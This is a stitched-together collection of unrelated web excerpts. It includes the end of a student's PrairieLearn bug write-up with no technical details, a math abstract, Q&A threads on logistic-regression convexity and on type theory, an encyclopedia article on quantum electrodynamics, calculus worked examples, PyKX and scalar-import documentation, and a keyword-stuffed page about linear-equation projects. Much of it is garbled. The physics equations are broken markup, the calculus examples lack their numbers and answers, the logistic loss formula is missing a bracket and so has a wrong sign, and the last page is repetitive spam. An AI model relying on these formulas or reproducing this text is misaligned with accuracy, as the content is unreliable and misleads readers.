Although this is not an official bug bounty thing and the vulnerability really isn’t something novel, it was still really fun having a glimpse of what the bug hunting world and the processes involved might look like. I am also really glad to be able to work with so many cool people on this journey - from our own profs to the PrairieLearn maintainers, it’s been a blast talking to and working with them on resolving this.
I’ve also really liked the concept of workspaces in PrairieLearn since it is convenient both for the students and also for the teaching team, so it felt pretty nice that I contributed in some way that there can be even more courses utilizing this feature in the future.
Again, thanks to the UBC CS department and the PrairieLearn maintainers for taking my ramblings seriously and handling this so quickly!
|
# Metrics of constant curvature on a Riemann surface with two corners on the boundary
Research paper by Juergen Jost, Guofang Wang, Chunqin Zhou
Indexed on: 19 Dec '07Published on: 19 Dec '07Published in: Mathematics - Differential Geometry
#### Abstract
We use PDE methods as developed for the Liouville equation to study the existence of conformal metrics with prescribed singularities on surfaces with boundary, the boundary condition being constant geodesic curvature. Our first result shows that a disk with two corners admits a conformal metric with constant Gauss curvature and constant geodesic curvature on its boundary if and only if the two corners have the same angle. In fact, we can classify all the solutions in a more general situation, that of the 2-sphere cut by two planes.
|
# is cost function of logistic regression convex or not? [duplicate]
This question already has an answer here:
For logistic regression, the loss function is convex or not? Andrew Ng of Coursera said it is convex but in NPTEL it is said is said it is non convex because there is no unique solution. (many possible classifying line)
## marked as duplicate by Sycorax, Michael Chernick, user158565, Jeremy Miles, Frans RodenburgJun 14 at 6:05
This question has been asked before and already has an answer. If those answers do not fully address your question, please ask a new question.
## 1 Answer
I don't think anybody claimed that it isn't convex, since it is convex (maybe they meant logistic function or neural networks). Let's check 1D version for simplicity
$$L = - t \log(p) + (1 - t) \log(1-p)$$
Where $$p = \frac{1}{1 + \exp(-wx)}$$
$$t$$ is target, $$x$$ is input, and $$w$$ denotes weights.
L is twice differentiable with respect to $$w$$ and $$\frac{d}{dw^2} L = \frac{x^2 \exp(wx)}{(1 + \exp(wx))^2} > 0$$, so the loss function is convex.
|
# Quantum electrodynamics
Quantum electrodynamics
Quantum electrodynamics (QED) is a relativistic quantum field theory of electrodynamics. QED was developed by a number of physicists, beginning in the late 1920s. It basically describes how light and matter interact. More specifically it deals with the interactions between electrons, positrons and photons. QED mathematically describes all phenomena involving electrically charged particles interacting by means of exchange of photons. It has been called "the jewel of physics" for its extremely accurate predictions of quantities like the anomalous magnetic moment of the electron, and the Lamb shift of the energy levels of hydrogen. [Richard Feynman, 1985. " [http://www.amazon.com/gp/reader/0691024170 QED: The strange theory of light and matter] " (chapter 1, page 6, first paragraph). Princeton Univ. Press.]
In technical terms, QED can be described as a perturbation theory of the electromagnetic quantum vacuum.
History
The word 'quantum' is Latin, meaning "how much" (neut. sing. of quantus "how great"). [Online Etymology Dictionary] The word 'electrodynamics' was coined by André-Marie Ampère in 1822. [Grandy, W.T. (2001). "Relativistic Quantum Mechanics of Leptons and Fields", Springer.] The word 'quantum', as used in physics, i.e. with reference to the notion of count, was first used by Max Planck, in 1900 and reinforced by Einstein in 1905 with his use of the term "light quanta".
Quantum theory began in 1900, when Max Planck assumed that energy is quantized in order to derive a formula predicting the observed frequency dependence of the energy emitted by a black body. This dependence is completely at variance with classical physics. In 1905, Einstein explained the photoelectric effect by postulating that light energy comes in quanta later called photons. In 1913, Bohr invoked quantization in his proposed explanation of the spectral lines of the hydrogen atom. In 1924, Louis de Broglie proposed a quantum theory of the wave-like nature of subatomic particles. The phrase "quantum physics" was first employed in Johnston's "Planck's Universe in Light of Modern Physics". These theories, while they fit the experimental facts to some extent, were strictly phenomenological: they provided no rigorous justification for the quantization they employed.
Modern quantum mechanics was born in 1925 with Werner Heisenberg's matrix mechanics and Erwin Schrödinger's wave mechanics and the Schrödinger equation, which was a non-relativistic generalization of de Broglie's(1925) relativistic approach. Schrödinger subsequently showed that these two approaches were equivalent. In 1927, Heisenberg formulated his uncertainty principle, and the Copenhagen interpretation of quantum mechanics began to take shape. Around this time, Paul Dirac, in work culminating in his 1930 monograph finally joined quantum mechanics and special relativity, pioneered the use of operator theory, and devised the bra-ket notation widely used since. In 1932, John von Neumann formulated the rigorous mathematical basis for quantum mechanics as the theory of linear operators on Hilbert spaces. This and other work from the founding period remains valid and widely used.
Quantum chemistry began with Walter Heitler and Fritz London's 1927 quantum account of the covalent bond of the hydrogen molecule. Linus Pauling and others contributed to the subsequent development of quantum chemistry.
The application of quantum mechanics to fields rather than single particles, resulting in what are known as quantum field theories, began in 1927. Early contributors included Dirac, Wolfgang Pauli, Weisskopf, and Jordan. This line of research culminated in the 1940s in the quantum electrodynamics (QED) of Richard Feynman, Freeman Dyson, Julian Schwinger, and Sin-Itiro Tomonaga, for which Feynman, Schwinger and Tomonaga received the 1965 Nobel Prize in Physics. QED, a quantum theory of electrons, positrons, and the electromagnetic field, was the first satisfactory quantum description of a physical field and of the creation and annihilation of quantum particles.
QED involves a covariant and gauge invariant prescription for the calculation of observable quantities. Feynman's mathematical technique, based on his diagrams, initially seemed very different from the field-theoretic, operator-based approach of Schwinger and Tomonaga, but Freeman Dyson later showed that the two approaches were equivalent. The renormalization procedure for eliminating the awkward infinite predictions of quantum field theory was first implemented in QED. Even though renormalization works very well in practice, Feynman was never entirely comfortable with its mathematical validity, even referring to renormalization as a "shell game" and "hocus pocus". (Feynman, 1985: 128)
QED has served as the model and template for all subsequent quantum field theories. One such subsequent theory is quantum chromodynamics, which began in the early 1960s and attained its present form in the 1975 work by H. David Politzer, Sidney Coleman, David Gross and Frank Wilczek. Building on the pioneering work of Schwinger, Peter Higgs, Goldstone, and others, Sheldon Glashow, Steven Weinberg and Abdus Salam independently showed how the weak nuclear force and quantum electrodynamics could be merged into a single electroweak force.
Physical interpretation of QED
In classical optics, light travels over all allowed paths and their interference results in Fermat's principle. Similarly, in QED, light (or any other particle like an electron or a proton) passes over every possible path allowed by apertures or lenses. The observer (at a particular location) simply detects the mathematical result of all wave functions added up, as a sum of all line integrals. For other interpretations, paths are viewed as non physical, mathematical constructs that are equivalent to other, possibly infinite, sets of mathematical expansions. According to QED, light can go slower or faster than c, but will travel at velocity c on average [Richard P. Feynman QED:(QED (book)) p89-90 "the light has an amplitude to go faster or slower than the speed "c", but these amplitudes cancel each other out over long distances"; see also accompanying text] .
Physically, QED describes charged particles (and their antiparticles) interacting with each other by the exchange of photons. The magnitude of these interactions can be computed using perturbation theory; these rather complex formulas have a remarkable pictorial representation as Feynman diagrams. QED was the theory to which Feynman diagrams were first applied. These diagrams were invented on the basis of Lagrangian mechanics. Using a Feynman diagram, one decides every possible path between the start and end points. Each path is assigned a complex-valued probability amplitude, and the actual amplitude we observe is the sum of all amplitudes over all possible paths. The paths with stationary phase contribute most (due to lack of destructive interference with some neighboring counter-phase paths) — this results in the stationary classical path between the two points.
QED doesn't predict what will happen in an experiment, but it can predict the "probability" of what will happen in an experiment, which is how it is experimentally verified. Predictions of QED agree with experiments to an extremely high degree of accuracy: currently about 10−12 (and limited by experimental errors); for details see precision tests of QED. This makes QED one of the most accurate physical theories constructed thus far.
Near the end of his life, Richard P. Feynman gave a series of lectures on QED intended for the lay public. These lectures were transcribed and published as Feynman (1985), , a classic non-mathematical exposition of QED from the point of view articulated above.
Mathematics
Mathematically, QED is an abelian gauge theory with the symmetry group U(1). The gauge field, which mediates the interaction between the charged spin-1/2 fields, is the electromagnetic field.The QED Lagrangian for a spin-1/2 field interacting with the electromagnetic field is given by the real part of
::
:where::$gamma_mu ,!$ are Dirac matrices;::$psi$ a bispinor field of spin-1/2 particles (e.g. electron-positron field);::, called "psi-bar", is sometimes referred to as Dirac adjoint;::$D_mu = partial_mu+ieA_mu ,!$ is the gauge covariant derivative;::$e$ is the coupling constant, equal to the electric charge of the bispinor field; ::$A_mu$ is the covariant four-potential of the electromagnetic field;::$F_\left\{mu u\right\} = partial_mu A_ u - partial_ u A_mu ,!$ is the electromagnetic field tensor.
Euler-Lagrange equations
To begin, substituting the definition of "D" into the Lagrangian gives us:::
Next, we can substitute this Lagrangian into the Euler-Lagrange equation of motion for a field:::$partial_mu left\left( frac\left\{partial mathcal\left\{L\left\{partial \left( partial_mu psi \right)\right\} ight\right) - frac\left\{partial mathcal\left\{L\left\{partial psi\right\} = 0 quad quad quad quad quad \left(2\right) ,$to find the field equations for QED.
The two terms from this Lagrangian are then:::
::
Substituting these two back into the Euler-Lagrange equation (2) results in:::with complex conjugate:::$i gamma^mu partial_mu psi - e gamma_mu A^mu psi - m psi = 0. ,$
Bringing the middle term to the right-hand side transforms this second equation into:::
References
Books
*
*
*
*
*
*
*
*
*
Journals
* J.M. Dudley and A.M. Kwan, "Richard Feynman's popular lectures on quantum electrodynamics: The 1979 Robb Lectures at Auckland University," American Journal of Physics Vol. 64 (June 1996) 694-698.
* [http://nobelprize.org/physics/laureates/1965/feynman-lecture.html Feynman's Nobel Prize lecture describing the evolution of QED and his role in it]
* [http://www.vega.org.uk/video/subseries/8 Feynman's New Zealand lectures on QED for non-physicists]
* [http://daarb.narod.ru/qed-eng.html On quantization of electromagnetic field]
Wikimedia Foundation. 2010.
### Look at other dictionaries:
• quantum electrodynamics — [with sing. v.] n. Physics a theory that applies the principles of the quantum theory to electrodynamics: it describes how photons interact electromagnetically with electrons, protons, etc … English World dictionary
• quantum electrodynamics — kvantinė elektrodinamika statusas T sritis fizika atitikmenys: angl. quantum electrodynamics vok. Quantenelektrodynamik, f rus. квантовая электродинамика, f pranc. électrodynamique quantique, f … Fizikos terminų žodynas
• quantum electrodynamics — quantum theory of electromagnetic radiation and its interaction with atom particles and electrically charged atoms (Quantum Mechanics) … English contemporary dictionary
• quantum electrodynamics — Physics. the quantum field theory that deals with the electromagnetic field and its interaction with electrons and positrons. Abbr.: QED [1925 30] * * * ▪ physics quantum field theory of the interactions of charged (electric charge)… … Universalium
• quantum electrodynamics — noun a relativistic quantum theory of the electromagnetic interactions of photons and electrons and muons • Syn: ↑QED • Hypernyms: ↑quantum field theory … Useful english dictionary
• quantum electrodynamics — noun plural but usually singular in construction Date: 1927 quantum mechanics applied to electrical interactions (as between nuclear particles) … New Collegiate Dictionary
• quantum electrodynamics — noun the study of the interaction of electromagnetic radiation with electrically charged matter within the framework of relativity and quantum mechanics … Wiktionary
• quantum electrodynamics — quan′tum electrodynam′ics n. phs (used with a sing. v.) the quantum mechanical theory of the electromagnetic field and its interaction with electrons and positrons Abbr.: QED • Etymology: 1925–30 … From formal English to slang
• quantum electrodynamics — (QED) A relativistic quantum theory of electromagnetic interactions. It provides a description of the interaction of electrons, muons and photons and hence the underlying theory of all electromagnetic phenomena … Dictionary of automotive terms
• quantum electrodynamics — plural noun [treated as sing.] a theory concerned with the electromagnetic field and its interaction with electrically charged particles … English new terms dictionary
|
# Calculus 1 : How to find rate of change
## Example Questions
### Example Question #2921 : Calculus
Find the rate of change of a function from to .
Explanation:
We can solve by utilizing the formula for the average rate of change:
.
Solving for at our given points:
Plugging our values into the average rate of change formula, we get:
### Example Question #12 : How To Find Rate Of Change
At what time does the function have a slope of ? Round to the nearest hundredth.
Explanation:
First, we want the slope, so we have to take a derivative of . We will need to use the power rule which is,
on the first term. We need to also recall that the derivative of is.
Applying these rules we get the following derivative.
We're looking for the time the slope is , so we have to set the derivative (which gives you slope) equal to
.
At this point you can use a graphing calculator to graph the function , and trace the graph to find the x value that results in a y value of . The positive solution rounded to the nearest hundredth is .
### Example Question #13 : How To Find Rate Of Change
A rectangle has a length of four feet and a width of six feet. If the width of the rectangle increases at a rate of , how fast is the area of the rectangle increasing?
The area of the rectangle does not change.
Explanation:
In this problem we are given the length and width of a rectangle as well as the rate at which the width is increasing. We are asked to find the rate of change of the area of a rectangle. The equation for finding the area of a rectangle is given as
.
By taking the derivative of this equation with respect to time, we can find how the area changes with respect to time. To take the derivative of an equation with two variables, we must use the product rule,
.
Applying the product rule to the equation we obtain
.
Because the width of the rectangle is increases at a rate of
Since the length of the rectangle does not change with respect to time, .
and are given to us as 4 feet and 6 feet respectively .
Therefore the area of this rectangle changes at a rate of when the width of the rectangle is increasing by .
### Example Question #11 : How To Find Rate Of Change
Find the rate of change of a function from to .
Explanation:
We can solve by utilizing the formula for the average rate of change: . Solving for at our given points:
Plugging our values into the average rate of change formula, we get:
.
### Example Question #15 : How To Find Rate Of Change
Find the rate of change of a function from to .
Explanation:
We can solve by utilizing the formula for the average rate of change: . Solving for at our given points:
Plugging our values into the average rate of change formula, we get:
.
### Example Question #16 : How To Find Rate Of Change
Find the rate of change of a function from to .
Explanation:
We can solve by utilizing the formula for the average rate of change: . Solving for at our given points:
Plugging our values into the average rate of change formula, we get:
.
### Example Question #17 : How To Find Rate Of Change
You are looking at a balloon that is away. If the height of the balloon is increasing at a rate of , at what rate is the angle of inclination of your position to the balloon increasing after seconds?
Explanation:
Using right triangles we know that
.
Solving for we get
.
Taking the derivative, we need to remember to apply the chain rule to since the height depends on time,
.
We are asked to find . We are given and since is constant, we know that the height of the balloon is given by .
Therefore, at we know that the height of the balloon is .
Plugging these numbers into we find
### Example Question #18 : How To Find Rate Of Change
Boat leaves a port at noon traveling . At the same time, boat leaves the port traveling east at . At what rate is the distance between the two boats changing at ?
Explanation:
This scenario describes a right triangle where the hypotenuse is the distance between the two boats. Let denote the distance boat is from the port, denote the distance boat is from the port, denote the distance between the two boats, and denote the time since they left the port. Applying the Pythagorean Theorem we have,
.
Implicitly differentiating this equation we get
.
We need to find when .
We are given
which tells us
Plugging this in we have
.
Solving we get
.
### Example Question #2931 : Calculus
Find if the radius of a spherical balloon is increasing at a rate of per second.
Explanation:
The volume function, in terms of a radius , is given as
.
The change in volume over the change in time, or
is given as
and by implicit differentiation, the chain rule, and the power rule,
.
Setting we get
.
As such,
.
### Example Question #20 : How To Find Rate Of Change
Find the rate of change of a function from to .
|
Relation between Russellian type theory and type systems
I recently realized that there is some sort of relation between Russellian type theory and type systems, as found e.g. in Haskell. Actually, some of the notation for types in Haskell seems to have precursors in type theory. But, IMHO, Russell motivation in 1908 was to avoid Russell's paradox, and I am not sure how that is related to type systems in computer science.
Is Russell's paradox in one form or another something that we would have to worry about, for example, if we didn't have a good type system in a given language?
Type theory" in the sense of programming languages and in the sense of Russell are closely related. In fact, the modern field of dependent type theory aims to provide a constructive foundations for mathematics. Unlike set theory, most research in type theory based math is done in proof assistants like Coq, NuPRL, or Agda. As such, proofs done in these systems are not only "formalizable" but actually fully formal and machine checked. Using tactics and other proof automation techniques we try to make proving with these systems "high level" and thus resemble informal mathematics, but because everything is checked we have much better guarantees on correctness.
See here
Types in ordinary programming languages tend to be more limited, but the meta theory is the same.
Something similar to Russell's paradox is a major issue in dependent type theory. In particular, having
Type : Type
Type_0 : Type_1
but in Coq by default these numbers are implicit as they normally don't matter for the programmer.
In some systems (Agda, Idris), the type in type rule is enabled via a compile flag. It makes the logics inconsistent, but often makes exploratory programming/proving easier.
Even in more mainstream languages, Russell's paradox occasionally shows up. For example, in Haskell, an encoding of Russell's paradox combining impredicativity and open type case is possible, allowing one to build divergent terms with out recursion even at the type level. Haskell is inconsistent" (when interpret as a logic in the usual way) since it supports both type and value level recursion, not to mention exceptions. None the less, this result is rather interesting.
• Thanks for your detailed answer - as far as proof goes, there are still no tools in sight to prove the correctness of programs in imperative languages like C++ or Java, right? I would love to put my hands on one of these... I realize this is a complete tangent. I know about Coq and Agda, but they didn't seem to be the right tools to prove correctness of programs written in C++ or Java. – Frank Aug 15 '13 at 3:45
• there are some tools. A few for C, many for Java, and tons for Ada. See for example: Why (Java, C, Ada), Krakatoa (Java), or SPARK (Ada subset with very good tooling). For C++ though, not so much. You also may be interested in YNot (Coq DSL). – Philip JF Aug 15 '13 at 4:02
You're right about Russell's motivation. His paradox plagues all theories of sets that admit unrestricted comprehension axioms to the effect that: any propositional function determines a set, namely that of all those entities that satisfy the function. Among theories of or based on sets that did have that flaw were Cantor's naive set theory and Frege's system of Grundgesetze (specifically: axiom 5).
Since types are considered to be special kinds of sets, if care is not taken, a similar paradox can creep into a type system.That being said, I'm not aware of any type systems that have suffered such a fate. I can only recall Church's early attempts at formulating lambda calculus in the 30s, which turned out to be inconsistent (Kleene-Rosser Paradox), but that one was neither due to types nor was related to Russell's paradox.
• Thanks for your answer. There are probably alternatives to types-a-la-Russell to avoid Russell paradox. Would any of these alternative solutions have anything interesting to contribute to computer languages? Mundane types are very useful to clearly specify contracts between parts of the code, and even before that, to give semantics to programs at all. Would there be other semantics that could be obtained with something else than types? (I have NO idea what that would be :-) – Frank Aug 15 '13 at 3:48
• Yes, lots of alternatives (Quine's NF, ZFC, etc), but I can't see any direct connections between the foundational crisis and programming languages. If you consider Martin Lof's type theory as a programming language, there might be some connection there reaching back to intuitionism. As regards the semantics of programming languages, there are some basic languages like PDL (Propositional Dynamic Logic) which have Kripke (or possible worlds) semantics. But types seem to me so fundamental that they might just be behind the scenes :) – Hunan Rostomyan Aug 15 '13 at 4:28
• But types are kind of a bummer: you want and need them, but you'd love to not have to specify them (hence, IMHO, why we have type inference systems in languages like Haskell or Ocaml (I love those languages)). At the other end of the spectrum, Python feels very intuitive and it is pleasant (and efficient in terms of coding time) to not have to worry too much about types in that language. Maybe type inference is the best of both world - but that's the engineer talking. I was just daydreaming that maths could contribute another significant concept (like types) to computer science :-) – Frank Aug 15 '13 at 4:38
• @Frank Every time I use a language without static types (mostly Ruby) I hate the experience, because I hate avoidable runtime errors. So, that seems to be a matter of taste mostly. I agree that powerful type inference can give you the best of both worlds. Which is, probably, why I like Scala so much. – Raphael Aug 15 '13 at 10:19
• I am not convinced that not having types "automatically" leads to runtime errors, as you seem to imply :-) I never had a problem in Python. – Frank Aug 15 '13 at 14:37
Since you mention Python the question is not purely type-theoretic. So I try to give a broader perspective on types. Types are different things to different people. I've collected at least 5 distinct (but related) notions of types:
1. Type systems are logical systems and set theories.
2. A type system associates a type with each computed value. By examining the flow of these values, a type system attempts to prove or ensure that no type errors can occur.
3. Type is a classification identifying one of various types of data, such as real-valued, integer or Boolean, that determines the possible values for that type; the operations that can be done on values of that type; the meaning of the data; and the way values of that type can be stored
4. Abstract data types allow for data abstraction in high level languages. ADTs are often implemented as modules: the module's interface declares procedures that correspond to the ADT operations. This information hiding strategy allows the implementation of the module to be changed without disturbing the client programs.
5. Programming language implementations use types of values to choose the storage the values need and algorithms for operations on the values.
The quotes are from Wikipedia, but I can provide better references should a need arise.
Types-1 arose from Russel's work, but today they are not merely protect from paradoxes: the typed language of homotopy type theory is a new way to encode mathematics in a formal, machine-understandable language, and a new way for humans to understand foundations of mathematics. (The "old" way is encoding using an axiomatic set theory).
Types 2-5 arose in programming from several different needs: to avoid bugs, to classify data software designers and programmers work with, to design large systems and to implement programming languages efficiently respectively.
Type systems in C/C++, Ada, Java, Python did not arose out of Russel's work or a desire to avoid bugs. They arose out of needs to describe different kinds of data out there (e.g. "last name is a character string and not a number"), modularize software design and to choose low-level representations for data optimally. These languages have no types-1 or types-2. Java ensures relative safety from bugs not by means of proving program correctness using type system, but by a careful design of language (no pointer arithmetic) and runtime system (virtual machine, bytecode verification). Type system in Java is neither a logical system nor a set theory.
However, type system in Agda programming language is a modern variant of Russel's type system (based on later work or Per Martin-Lof and other mathematicians). The type system in Agda is designed to express mathematical properties of program and proofs of those properties, it is a logical system and a set theory.
There are no black-white distinction here: many languages fit in between. For example, type system of Haskell language has roots in Russel's work, can be viewed as a simplifed Agda's system, but from mathematical standpoint, it's inconsistent (self-contradictory) if viewed as a logical system or a set theory.
However, as a theoretical vehicle to protect Haskell programs from bugs, it works pretty well. You even can use types to encode certain properties and their proofs, but not all properties can be encoded, and the programmer can still violate the proved properties if he uses discouraged dirty hacks.
Type system of Scala is even further from Russel's work and Agda's perfect proof language, but still has roots in Russel's work.
As for proving properties of industrial languages whose type systems were not designed for that, there are many approaches and systems.
For interesting but different approaches, see Coq and Microsoft Boogie research project. Coq relies on type theory to generate imperative programs from Coq programs. Boogie relies on annotation of imperative programs with properties and proving those properties with Z3 theorem prover using a completely different approach than Coq.
|
# Library limitations
When q is run embedded within a Python process (as opposed to over IPC), it is restricted in how it can operate. This is a result of the fact that when running embedded it does not have the main loop or timers that one would expect from a typical q process. The following are a number of examples showing these limitations in action
## IPC Interface
As a result of the lack of a main loop PyKX cannot be used to respond to q IPC requests as a server. Callback functions such as .z.pg defined within a Python process will not operate as expected.
In a Python process, start a q IPC server:
>>> import pykx as kx
>>> kx.q('\\p 5001')
pykx.Identity(pykx.q('::'))
>>>
Then in a Python or q process, attempt to connect to it:
>>> import pykx as kx
>>> q = kx.QConnection(port=5001) # Attempt to create a q connection to a pykx embedded q instance
# Will hang indefinitely since the embedded q process cannot respond to IPC requests
// Attempting to create an IPC connection to a PyKX embedded q instance
// will hang indefinitely since the embedded q process cannot respond to IPC requests
q)h: hopen ::5001
Do not use PyKX as an IPC server
Attempting to connect to a Python process running PyKX over IPC from another process will hang indefinitely.
## Timers
Timers in q rely on the use of the q main loop, as such these do not work within PyKX. For example:
>>> import pykx as kx
>>> kx.q('.z.ts:{0N!x}') # Set callback function which should be run on a timer
>>> kx.q('\t 1000') # Set timer to tick every 1000ms
pykx.Identity(pykx.q('::')) # No output follows because the timer doesn't actually tick when within
# a Python process
Attempting to use the timer callback function directly using PyKX will raise an AttributeError as follows
>>> kx.q.z.ts
AttributeError: ts: .z.ts is not exposed through the context interface because the main loop is inactive in PyKX.`
|
# data scalar import command
Syntax
data scalar import s <keyword>
Import scalars from file s. The extension scalar is added automatically if one is not given.
The file format (text or binary) is determined by opening the file and looking for the appropriate header. If the proper header is not found, an error is indicated and no data imported. If the group keyword is specified, imported scalars are assigned the specified group name. In the event of a conflict, this group assignment overrides any in the import file. The relevant file formats are fully documented in Scalar Text File Format and Scalar Binary File Format.
group s <slot s >
Assign the group name s to the slot Default. The optional slot keyword can be used to specify the slot.
|
Solving Permutations and Combinations.Solving for variable.Find the value of r in 6Pr = 30?
Then teach the underlying concepts
Don't copy without citing sources
preview
?
Explanation
Explain in detail...
Explanation:
I want someone to double check my answer
2
Featured answers represent the very best answers the Socratic community can create.
Jan 22, 2018
$r = 2$
Explanation:
For this problem, I will use the simplest way possible to solve this.
Remember that: nPr=(n!)/((n-r)!)
For $6 P r = 30$, we have: (6!)/((6-r)!)=30=>720/((6-r)!)=30/1
Using the fact that $\frac{a \cdot b}{c \cdot b} = \frac{a}{c}$, we can see that:
720/((6-r)!)=30/1
(720*x)/((6-r)!*x)=30/1
Where $x = \frac{30}{720} \implies \frac{1}{24}$
Therefore,
(720*1/24)/((6-r)!*1/24)=30/1
Which means that (6-r)!*1/24=1. We try to simplify this equation.
(6-r)! =24
Now, we try to think of our basic factorial numbers.
1! =1
2! =2
3! =6
4! =24
Oh! $6 - r$ must equal 4...!
We can now solve the equation:
$6 - r = 4$
$- r = - 2$
$r = 2$
• 10 minutes ago
• 12 minutes ago
• 15 minutes ago
• 18 minutes ago
• 11 seconds ago
• 16 seconds ago
• A minute ago
• 4 minutes ago
• 7 minutes ago
• 10 minutes ago
• 10 minutes ago
• 12 minutes ago
• 15 minutes ago
• 18 minutes ago
|
+0
0
208
1
Let z be a complex number such that |z - 5 - i| = 5. Find the minimum value of $$|z - 1 + 2i|^2 + |z - 9 - 4i|^2$$.
Let z be a complex number such that z^5 = 1 and $$z \neq 1$$. Compute $$z + \frac{1}{z} + z^2 + \frac{1}{z^2}.$$
Apr 18, 2019
|
Cutting Back Hellebores In Summer, Inheritance In Use Case Diagram, Minecraft Elevator Soul Sand, Sorry To Bother You On The Weekend, Rabies Vaccine For Goats, Subject To Real Estate Course, Marcus Samuelsson Yardbird Restaurant, Bdo Oquilla Eye, Sew On Labels Canada, " />
system of linear equations project
system of linear equations project
In the last few weeks, we have talked about systems of linear equations and learned several methods to solve systems including graphing, elimination, and substitution. Guassian elimination method; Guass Siedel method; This project also includes finding inverse of the matrix using LDU decomposition. (b) Unique solution. Question: System Of Linear Equations Project Introduction Systems Of Linear Equations Are A Useful Way To Solve Common Problems In Different Areas Of Life. Nov 30, 2016 - Explore stemta18's board "Algebra 1 Project Ideas" on Pinterest. Linear equation system. Solving a System of Linear Equations. For this project I collaborated with Dan Sarkes and Adam Rienzie. Pick any pair of equations and solve for one variable. NO LATE PROJECTS ACCEPTED! 2.1 Direct methods (Inverse of a Matrix, Cramer's Rule, Gauss Jordan, Montante). Systems of Linear Equations These problems can be solved by using two or more variables and writing a system of equations. Algebra I Final Project Introduction: Systems of linear equations are a useful way to solve common problems in different areas of life. Seattle Girls School 8th Grade Alone We Go Fast Together Far. See more ideas about systems of equations, high school math, algebra. But it's interdisciplinary, gets students to apply math in a real life situation, easy to differentiate and really great! The power and progress in Matrices and its application did not come to fruition until the late 17th century. Share Share Equations: X=Seconds . For this reason, we are no longer limited to using one variable when setting up equations that model applications. iRubric RXXA7CB: Analyze and solve pairs of simultaneous linear equations. Project 4: Systems of non-linear differential equations. In this project, you will be using systems of linear equations to decide which car to buy. Systems of Linear Equations Project By: Justin Kempire & Luke Steiner. Jim can run and dribble a basketball at 10 meters per second. Shrek has completed 10 plushies and will complete 5 more per day. I followed a template with Find, however it just don't get me anywhere. If we translate an application to a mathematical setup using two variables, then we need to form a linear system with two equations. Introduction . How to download a copy of the project. One of the most powerful ways to use them is in a comparison model where two similar situations are compared side by side to determine which one is better. We have explored several real life problem situations where we use systems to solve. Differential equations can be used to model various epidemics, including the bubonic plague, influenza, AIDS, the 2015 ebola outbreak in west Africa, and most currently the coronavirus … Systems Of Inequalities Word Problems. (c) Inflnitely many solutions. A linear system is said to be consistent if it has at least one solution; and is said to be inconsistent if it has no solution. Pick another pair of equations and solve for the same variable. Jun 3, 2016 - Real-world applications of linear equations and systems of equations when students examine the cost of college. The points of intersection of two graphs represent common solutions to both equations. Given a linear system of three equations, solve for three unknowns. 3. Project Euclid - mathematics and statistics online. In some differential equations such as stiff equations Euler’s method can be numerically unstable. Hello All, I am struggling to find the proper code for solving a system of non linear equations, using Mathcad 15. Subjects: Algebra, Applied Math, Word Problems. The purpose of this project is to explore the limitations of Euler’s method. Students select from two different types of cars one being a hybrid car and the other being a "gas guzzler" car. These methods make … In order to complete this project, start by selecting one of the situations below: Cell Phone Plan: Your parents have decided that you should pay for your own cell phone. System solution methods involve the use of substitution or combination techniques. : This instruction will help you to solve a system of 3 linear equations with 3 unknown variables.Minimum requirements: Basic knowledge of … Systems of linear equations are a useful way to solve common problems in different areas of life. This project is a software to solve Linear Systems of equations using Crout and Doolittle matrix decomposition algorithms in Python. The algorithms used to solve the system of linear equations are . A valuable project for Algebra 2 students. 4. Solved I Had Problems With Doing The Graph And Numbe . Nov 17, 2018 - Explore Katie Kilgore Widener's board "Systems of Equations", followed by 388 people on Pinterest. (a) No solution. Any system of linear equations has one of the following exclusive conclusions. Bob can do the same at 5 meters a second. Sam found a 2012 Toyota Prius with the original price of $29,805 and a fuel In mathematics, a system of linear equations (or linear system) is a collection of one or more linear equations involving the same set of variables. PARKING For example, + − = − + = − − + − = is a system of three equations in the three variables x, y, z.A solution to a linear system is an assignment of values to the variables such that all the equations are simultaneously satisfied. Roots of equations. Students are given th. Solving Systems by Graphing Problem: Jim and Bob are dribbling basketballs. You must use each method for solving systems of equations (graphing, substitution, and elimination). To download a copy of the project, just go on the main page of the project on GitHub, click on "Clone or … Two systems are equivalent if either both are inconsistent or each equation of any of them is a linear combination of the equations of the other one. Systems of Linear Equations Project Algebra 1 Advanced Mod 10-11 The best way to understand the value of learning about Systems of Linear Equations is to see how you can use them in your life. Nonlinear equation systems (Newton 1st order, Newton 2nd order). How many seconds will it take for them to be at the same distance? Fiona has not completed any yet, but has a load of free time and can make 10 per day. One method per question.. Free rubric builder and assessment tools. To run Systems of linear equations are a useful way to solve common problems in different areas of life. Two linear systems using the same set of variables are equivalent if each of the equations in the second system can be derived algebraically from the equations in the first system, and vice versa. Chapter IV. … Systems Of Linear Equations Project. Systems of Equations Project DUE – February 13, 2014! This is done as a part of mini project in algorithm course The aim of this project is to solve a set of linear equations with many unknowns. Around 200 BC, theChinese published that “Nine Chapters of the MathematicalArt,” they displayed the ability to solve a 3X3 system of equations (Perotti). Efee Ebraicaly To Find He Componentsoc Ganizer St Chegg Com. To summarize, a system of linear equations with 2 unknowns must have at least 2 equations to get a unique solution. We now have the techniques needed to solve linear systems. Section 2.5 Projects for Systems of Differential Equations Subsection 2.5.1 Project—Mathematical Epidemiology 101. One of the most powerful ways to use them is in a comparison model where two similar situations are compared side by side to determine which one is better. PROJECT PARKING - Free download as Powerpoint Presentation (.ppt / .pptx), PDF File (.pdf), Text File (.txt) or view presentation slides online. Solving Systems by Graphing Example. Having 3 (or more) equations is too many. Solving Systems of Linear Equations Project Word Problem Graph You and Sam have decided to buy a car, you found a 2012 Chevy Camaro with the original price of$23,280 and a fuel tank capacity of 19 gal. Systems of Equations Project - Business Letters This is not really a performance task (which is what we are trying to do one per unit in Algebra One), it's more of a project. The problem is related to thermodynamics. Around 4000 years ago, the people of Babylon knew how to solve a simple2X2 system of linear equations with two unknowns. See more ideas about Systems of equations, Equations, Middle school math. One of the most powerful ways to use them is in a comparison model where two similar situations are compared side by side to determine which one is better. We consider solving such large-scale systems of linear equations $\mathbf{A}\mathbf{x}=\mathbf{b}$ that are inconsistent due to corruptions in the measurement vector $\mathbf{b}$. System Of Linear Equations Project Introduction Sy Chegg Com. Shrek and Fiona are knitting Onion Plushies to give to the children at a local school, Swampville Elementary. Solve the resulting two-by-two system. Systems of Linear Equations Project. This is a Common Core System of Linear Equations project in which students work in pairs or in groups to determine if it is worth paying more now or later for a car. Having 2 equations is exactly enough, as long as they are not redundant or inconsistent. Choose a row horizontal, vertical, or diagonal from the tic tac toe board provided. One Of The Most Powerful Ways To Use Them Is In A Comparison Model Where Two Similar Situations Are Compared Side By Side To Determine Which One Is Better. Grades: 7 th, 8 th, 9 th. Systems of differential equations are very useful in epidemiology. Bob 